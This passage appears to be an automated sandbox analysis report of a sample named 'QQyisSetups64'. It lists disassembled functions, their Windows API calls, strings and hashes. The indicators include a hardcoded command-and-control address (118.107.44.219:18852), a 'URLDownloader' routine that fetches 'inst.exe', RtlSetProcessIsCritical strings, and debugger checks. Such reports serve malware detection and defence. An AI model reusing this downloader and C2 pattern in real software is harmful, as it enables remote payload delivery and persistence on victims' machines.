String ID: RtlAdjustPrivilege$RtlSetProcessIsCritical$indow$ndowClass$ntdll.dll
API String ID: 3658383123-467612925
Opcode ID: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
Instruction ID: 32e2e5621d63ba41cde31a5517ede96aa96e783cbb1150e0d99a961b1b18e838
Opcode Fuzzy Hash: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
Instruction Fuzzy Hash: A331F4B4D40218AFEB14DFE5CC89BDDBBB4FF48701F108119F60AAA294D7749690CB10

Function 02861A37 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87windownativethreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02861A74
CreateWindowExW.USER32(00000000,1001241C,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 02861A9A
SendMessageW.USER32(100176D4,00000409,00000000,00D77800), ref: 02861ACE
CreateThread.KERNEL32(00000000,00000000,10001B80,?,00000000,00000000), ref: 02861B20
PostQuitMessage.USER32(00000000), ref: 02861B2B
NtdllDefWindowProc_W.NTDLL(00000002,?,?,?), ref: 02861B44

Strings

, xrefs: 02861A5F

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: CreateMessageWindow$HandleModuleNtdllPostProc_QuitSendThread
String ID:
API String ID: 4292518056-3916222277
Opcode ID: 92815e4858959fe170ce8b5a77519db06f86c61dccf7134616d8db3801c69204
Instruction ID: cc752dcd52aa9265c7c0a36d6adc18b2905358c888318f77e8925626a8a4a4c9
Opcode Fuzzy Hash: 92815e4858959fe170ce8b5a77519db06f86c61dccf7134616d8db3801c69204
Instruction Fuzzy Hash: 0A3128B8640208FFEB10DF98CC89FAA7BB5EB48705F10C148FA09AB291D770D950CB65

Function 1001124D Relevance: 9.1, APIs: 6, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 10011259
memset.VCRUNTIME140(?,00000000,00000003), ref: 1001127F
memset.VCRUNTIME140(?,00000000,00000050), ref: 10011309
IsDebuggerPresent.KERNEL32 ref: 10011325
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001133E
UnhandledExceptionFilter.KERNEL32(?), ref: 10011348

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
String ID:
API String ID: 1045392073-0
Opcode ID: 16eea3db4395ea0ceff495b684aed5e6782a3178d032496c99d6345cf79e782e
Instruction ID: 9c1a1b5f42fc978b2ff8cf04cdab4bc874b060df06568115b329f45e6489fc23
Opcode Fuzzy Hash: 16eea3db4395ea0ceff495b684aed5e6782a3178d032496c99d6345cf79e782e
Instruction Fuzzy Hash: 3431E7B5D01228DADB11DFA4D9897CDBBB8FF08700F1041AAE40CAB250EB719B84CF45

Function 02871224 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 02871230
IsDebuggerPresent.KERNEL32 ref: 028712FC
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02871315
UnhandledExceptionFilter.KERNEL32(?), ref: 0287131F

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 66dfac0479178b899c88c3770155f14939d35e9485ae9a94106db669959441a0
Instruction ID: 1e3d17204ea4d70f8fe26df2cb420316f2559f6a84e611c95aa13b127aea49cc
Opcode Fuzzy Hash: 66dfac0479178b899c88c3770155f14939d35e9485ae9a94106db669959441a0
Instruction Fuzzy Hash: 1531DAB9D01228DBDF21DFA4D9497CDBBB8AF08300F10419AE40CAB250E7759A85CF45

Function 0286EE57 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

RpcStringBindingComposeW.RPCRT4(00000000,100124B8,100124E4,100124CC,00000000,02861D65), ref: 0286EE95
RpcBindingFromStringBindingW.RPCRT4(02861D65,00000000), ref: 0286EEB0
RpcBindingSetAuthInfoExA.RPCRT4(00000000,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 0286EEE7
RpcStringFreeW.RPCRT4(02861D65), ref: 0286EEF1

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: Binding$String$AuthComposeFreeFromInfo
String ID:
API String ID: 1126441048-0
Opcode ID: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
Instruction ID: ae46d6974ea60b10b24dce4f842b24a2ed8d0120ca92f721577ae9fb52ee315a
Opcode Fuzzy Hash: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
Instruction Fuzzy Hash: CD11DAB5D00219BFEB14CFE4C989BEEBBB4FB08704F108559E605B7280D7B59A54CBA0

Function 100113E9 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 100113FB
GetCurrentThreadId.KERNEL32 ref: 1001140A
GetCurrentProcessId.KERNEL32 ref: 10011413
QueryPerformanceCounter.KERNEL32(?), ref: 10011420

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
Instruction ID: 0a3c688fa97bd66b33bde44f19f6c44622bf0dc03c57f15caf060906c92fb81b
Opcode Fuzzy Hash: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
Instruction Fuzzy Hash: 45F062B4D1021DEBDB05DBB4CA8999EBBF4FF1D200B918696E412E7111E730EB64DB50

Function 02871521 Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02871526
UnhandledExceptionFilter.KERNEL32(?), ref: 0287152F
GetCurrentProcess.KERNEL32(C0000409), ref: 0287153A
TerminateProcess.KERNEL32(00000000), ref: 02871541

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 0d7c60a2ef05bffbce595573e6e262163d78959232fdd7494e8d52d076cdfd15
Instruction ID: 4980016af1f69655e72f99868af42ae204db573405a571edd3281e81c481927a
Opcode Fuzzy Hash: 0d7c60a2ef05bffbce595573e6e262163d78959232fdd7494e8d52d076cdfd15
Instruction Fuzzy Hash: F6D012B1000114ABE7022FF0DD4CB593F29FB0C202F058200F30981022CB32D422CF51

Function 02871520 Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02871526
UnhandledExceptionFilter.KERNEL32(?), ref: 0287152F
GetCurrentProcess.KERNEL32(C0000409), ref: 0287153A
TerminateProcess.KERNEL32(00000000), ref: 02871541

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: b06f1e73e4fc9b3e9c8109c654ce749b3bdcd294ed5a62abbbf62953f21e2e11
Instruction ID: c91bca8abe4cc31a3593bf64d34d242ed6c9426ffac9acabdf0b694d2cdf9089
Opcode Fuzzy Hash: b06f1e73e4fc9b3e9c8109c654ce749b3bdcd294ed5a62abbbf62953f21e2e11
Instruction Fuzzy Hash: A4D0C9B1044114AFEB025BF0AD8CAAD3F25FB0C202F058304F34A81462C6728422CF11

Function 02870EE7 Relevance: 1.7, APIs: 1, Instructions: 242COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 02870EFD

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
Instruction ID: d98202a22532f577ecb4645af019a0a68f0e8506740e40155c68da1d17d8fa4f
Opcode Fuzzy Hash: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
Instruction Fuzzy Hash: 9EA149B9A10715CBEB1ACF58C8C579ABBB1FB48324F24C52AE429EB6A0D334D540CF50

Function 10010F10 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 10010F26

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
Instruction ID: 2823fa2859f74bead7cb2a3ff5e24ff6c926bc6ae68a0f7e2a3c8df160a01c34
Opcode Fuzzy Hash: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
Instruction Fuzzy Hash: EBA1F7B1E11715CBEB1ACF54C8C169ABBF1FB48364F15C52AE819EB290D374DA808B90

Function 02861087 Relevance: 1.6, APIs: 1, Instructions: 74nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(00000011,?,?,?), ref: 02861135

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 107021637aa96cc5c1bd2a280f74957b00f7bc018f5350d6d5e6892ae08a1c1a
Instruction ID: 856db20c47a496988a0d8a66210a93f0feb4fdd4e401a7462383dea50b9fbc9a
Opcode Fuzzy Hash: 107021637aa96cc5c1bd2a280f74957b00f7bc018f5350d6d5e6892ae08a1c1a
Instruction Fuzzy Hash: B621EB78A44209AFEB14CF94CC8ABFD7775EB48701F109059FA1AAA2D1D7B09540CB51

Function 02860AE4 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
Instruction ID: 634bfd2156d84de619274b3c3120b2bc194c5d1f1ca33c58dade77456779207e
Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
Instruction Fuzzy Hash: 2131AA7AA0834B8FC310DF18C48092AB3E5FF89218F1A496DE985D7312E330F959CB95

Function 100100C0 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 163networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 100100E3
getaddrinfo.WS2_32(118.107.44.219,18852,?,00000000), ref: 1001012A
WSACleanup.WS2_32 ref: 10010139
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10010141
socket.WS2_32(?,?,?), ref: 10010182
WSACleanup.WS2_32 ref: 10010196
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001019E

Strings

118.107.44.219, xrefs: 10010125
18852, xrefs: 10010120

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Cleanupexit$Startupgetaddrinfosocket
String ID: 118.107.44.219$18852
API String ID: 2357443324-3001398927
Opcode ID: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
Instruction ID: 5d8dd8f7e503384157f0d0037aa173dfcecf3f6c77ed8d91bfff33004e817cc6
Opcode Fuzzy Hash: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
Instruction Fuzzy Hash: BC61F8B0A05225EFE704DFA8CD88B9D7BB5FB48311F108199F519AB2A0C774D980DB65

Function 1000CDE0 Relevance: 21.2, APIs: 14, Instructions: 249COMMON

Download Yara Rule

APIs

?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE28
?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE4D
?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE76
?flags@ios_base@std@@QBEHXZ.MSVCP140(6EA14730), ref: 1000CEE5
?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000CF26
?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDXZ.MSVCP140 ref: 1000CF3A
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 1000CF4B
?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000CF9C
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(1000464B,?,?), ref: 1000CFB4
?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000D010
?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDXZ.MSVCP140 ref: 1000D024
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 1000D035
?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000), ref: 1000D088
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 1000D0DA

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?fill@?$basic_ios@?sputc@?$basic_streambuf@$?flags@ios_base@std@@?setstate@?$basic_ios@?sputn@?$basic_streambuf@
String ID:
API String ID: 4125389999-0
Opcode ID: 59b01a8a1e4c3d00d3f06f912504ee37e6c2b8c400d0ac45f0271c315747a722
Instruction ID: 9f71a8f020fe28d290ef7ad39ca2b4630c2ccf5d8ae75f0951f39d4c8cecbd13
Opcode Fuzzy Hash: 59b01a8a1e4c3d00d3f06f912504ee37e6c2b8c400d0ac45f0271c315747a722
Instruction Fuzzy Hash: 35B1C974D00259DFEB04CF94C895BADBBB1FF48344F208169E90AAB359CB34A985CF90

Function 02870097 Relevance: 19.7, APIs: 13, Instructions: 163networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 028700BA
getaddrinfo.WS2_32(100170B4,10013B50,?,00000000), ref: 02870101
WSACleanup.WS2_32 ref: 02870110
socket.WS2_32(?,?,?), ref: 02870159
WSACleanup.WS2_32 ref: 0287016D

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: Cleanup$Startupgetaddrinfosocket
String ID:
API String ID: 2560534018-0
Opcode ID: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
Instruction ID: 21b0b0790c34189d8d3567152e655fbba220c72fba53aaa7af3dd52b19a4c61b
Opcode Fuzzy Hash: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
Instruction Fuzzy Hash: 456119B9905215EFE705DFA8CD88BAE7BB5FB08315F108199E509A72A0C734D940CF65

Function 02861B87 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 143networkwindowfileCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(10012448,00000001,00000000,00000000,00000000), ref: 02861BA1
InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 02861BBD
HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 02861C04
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 02861C21
InternetReadFile.WININET(?,?,00001000,?), ref: 02861C3C
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 02861CF2
InternetCloseHandle.WININET(?), ref: 02861D0F
InternetCloseHandle.WININET(?), ref: 02861D19
GetParent.USER32(?), ref: 02861D23
ShowWindow.USER32(?,00000000), ref: 02861D32

Strings

inst.exe, xrefs: 02861D38

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: Internet$CloseHandleMessageOpenSend$FileHttpInfoParentQueryReadShowWindow
String ID: inst.exe
API String ID: 2293700532-606395854
Opcode ID: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
Instruction ID: 0a6ae5a8c0a7f2d22a216ee2994046773e4b3220c9abe0bb299dff6a22d92d4c
Opcode Fuzzy Hash: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
Instruction Fuzzy Hash: A6512AB5D40218ABEB00DFA4CD89BAEB775FF49701F108608F605BA290D775AA90DF61

Function 02861807 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 153windowregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 02861829

Part of subcall function 028615D7: SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 02861632
Part of subcall function 028615D7: CoTaskMemFree.COMBASE(00000000), ref: 02861685

RegisterClassW.USER32(?), ref: 02861984
CreateWindowExW.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 028619BF
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 028619CE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 028619F5
TranslateMessage.USER32(?), ref: 02861A03
DispatchMessageW.USER32(?), ref: 02861A0D

Strings

inst.exe, xrefs: 0286186E, 028618DA, 028619A8
URLDownloader, xrefs: 02861935

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: Message$Window$ClassCreateDispatchFolderFreeHandleKnownModulePathRegisterShowTaskTranslate
String ID: URLDownloader$inst.exe
API String ID: 1820083345-3182466430
Opcode ID: ad90597b90d91a76d6bc916b8ac211ae3b74ff0302ccb105c1be54824f9a3ca4
Instruction ID: e3fda98b27929b7e36c51eeb4c22022801b3c22077e2b015d9fcc42dfb17ba42
Opcode Fuzzy Hash: ad90597b90d91a76d6bc916b8ac211ae3b74ff0302ccb105c1be54824f9a3ca4
Instruction Fuzzy Hash: 165117B5D00258AFDB14DFA8CC44BEDBBB5FB58300F1081A9E609EB294EB755A44CF52

Function 10010CB7 Relevance: 13.6, APIs: 9, Instructions: 135COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 10010CFE
___scrt_uninitialize_crt.LIBCMT ref: 10010D18

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 649f4d9b7be6ac56b36da947fabe160b4803ea2d6c825da84b9566d7c5061089
Instruction ID: 82a901a5c9dd6496ef150d4dfe0cb85e0fd21509eb0d390bdb30e226946f8a75
Opcode Fuzzy Hash: 649f4d9b7be6ac56b36da947fabe160b4803ea2d6c825da84b9566d7c5061089
Instruction Fuzzy Hash: CD41BF76F00269EBDB20CF95DC41BAE3AB5FB40AA4F114919F8956F251C7B0ED818BD0

Function 02861147 Relevance: 13.6, APIs: 9, Instructions: 87librarywindowloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(10012398), ref: 02861152
GetProcAddress.KERNEL32(?,100123AC), ref: 02861164
GetProcAddress.KERNEL32(?,100123C0), ref: 02861178
GetModuleHandleA.KERNEL32(00000000), ref: 028611D4
RegisterClassW.USER32(?), ref: 028611E8
CreateWindowExW.USER32(00000000,100123D8,100123EC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0286120D
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 02861228
TranslateMessage.USER32(?), ref: 02861236
DispatchMessageW.USER32(?), ref: 02861240

Memory Dump Source

Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd

Similarity

API ID: Message$AddressProc$ClassCreateDispatchHandleLibraryLoadModuleRegisterTranslateWindow
String ID:
API String ID: 3658383123-0
Opcode ID: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
Instruction ID: 8586ceb415dd2ea73de2acc4d2d2ff592ec1472dfa07cfd4ecab68f939b43347
Opcode Fuzzy Hash: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
Instruction Fuzzy Hash: 7431D4B4D40618AFEB14DFE5CD89BADBBB8FF48701F108119F60AAA290D7749694CF50

Function 1000B4A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4D7
?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4E4
?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4EF
?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B50B

Strings

, xrefs: 1000B58B

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?epptr@?$basic_streambuf@Pninc@?$basic_streambuf@
String ID:
API String ID: 1504536088-3916222277
Opcode ID: d5684b002ae4a391e6b99177807e7a6d2de76d4cb44b71006c1053045423b1f9
Instruction ID: 9fd4f056ea7531655faf49f776dc9014e5164f0190cfa771b6f3da1c1fb63bf9
Opcode Fuzzy Hash: d5684b002ae4a391e6b99177807e7a6d2de76d4cb44b71006c1053045423b1f9
Instruction Fuzzy Hash: 085173B5D00609EFEB05CFD4C885EEEBBB5EF04381F048199E901A7259DB35AE44CBA1

Function 1000B020 Relevance: 10.7, APIs: 7, Instructions: 190COMMON

Download Yara Rule

APIs

?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B042
?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B04F
?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B05A
?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B067

Memory Dump Source

Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@Gninc@?$basic_streambuf@
String ID:
API String ID: 623893373-0
